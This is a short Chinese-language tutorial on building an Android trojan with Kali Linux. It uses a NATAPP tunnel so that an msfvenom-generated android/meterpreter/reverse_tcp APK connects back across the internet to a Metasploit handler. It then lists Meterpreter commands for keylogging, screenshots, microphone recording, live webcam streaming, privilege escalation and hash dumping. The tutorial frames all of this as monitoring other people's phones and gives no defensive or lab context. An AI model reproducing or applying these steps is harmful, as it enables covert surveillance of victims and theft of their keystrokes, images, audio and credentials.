Kali之安卓木马

Kali linux的安卓木马一般只能在内网操作，要想在监控互联网的安卓手机，必须要使用内网穿透，工具有很多，我使用的是NATAPP。思路如下：

实现内网穿透

Metasploit木马操作

一、实现内网穿透

1.进入https://natapp.cn/，根据提示注册并创建免费隧道

2 进入https://natapp.cn/#download下载linux的客户端

3 命令行内启动natapp。语句： ./natapp -authtoken=************ 后面的星号换成自己的authtoken口令（如果提示权限不够 chmod a+x natapp ）

4 得到服务器地址。ping 一下第一个圈内的服务器。得到ip地址是xxx.x.xx.x 后面位端口号：34611

二、Metasploit木马操作

5.生成木马APP。然后输入命令：

msfvenom -p android/meterpreter/reverse_tcp LHOST=服务器的ip（上面ping服务器得到的ip） LPORT=34611（上面服务器的端口号） R > /root/apk.apk

34611是设置的端口，显示这个说明已经生成木马成功了,如图：

6.启动msf。msfconsole 然后输入命令：

use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload

修改ip与端口

set LHOST 127.0.0.1 //这里的地址设置成NATAPP中配置的本地ip
set LPORT 2018 //这里的地址设置成NATAPP中配置的本地端口
exploit //开始监听等待木马响应

下面是一些木马的常用命令：

enumdesktops -->列出所有可访问的桌面和窗口站（窗体列表）

getdesktop -->得到当前的Meterpreter桌面

idletime -->返回秒远程用户已经闲置数量

keyscan_dump -->转储按键缓冲（下载键盘记录）

keyscan_start -->开始捕获击键（开始键盘记录）

keyscan_stop -->停止捕获击键（停止键盘记录）

screenshot -->抓取交互式桌面截图（当前操作界面截图一张）

setdesktop -->改变meterpreters当前桌面

uictl -->控制一些用户界面组件（获取键盘、鼠标控制权）

使用uictl -h 查看帮助（打开/关闭，键盘/鼠标）

PS：键盘记录注意点，先开始，后下载，再结束，否则会出错

摄像头：Stdapi: Webcam Commands（摄像头命令）

record_mic -->X秒从默认的麦克风record_mic音频记录（音频录制）

webcam_chat -->开始视频聊天（视频，对方会有弹窗）

webcam_list -->单摄像头（查看摄像头列表）

webcam_snap -->采取快照从指定的摄像头（摄像头拍摄一张照片）

webcam_stream -->播放视频流从指定的摄像头（开启摄像头监控）

其他命令操作

getsystem -->获取高权限

hashdump -->获取当前用户hash

THE END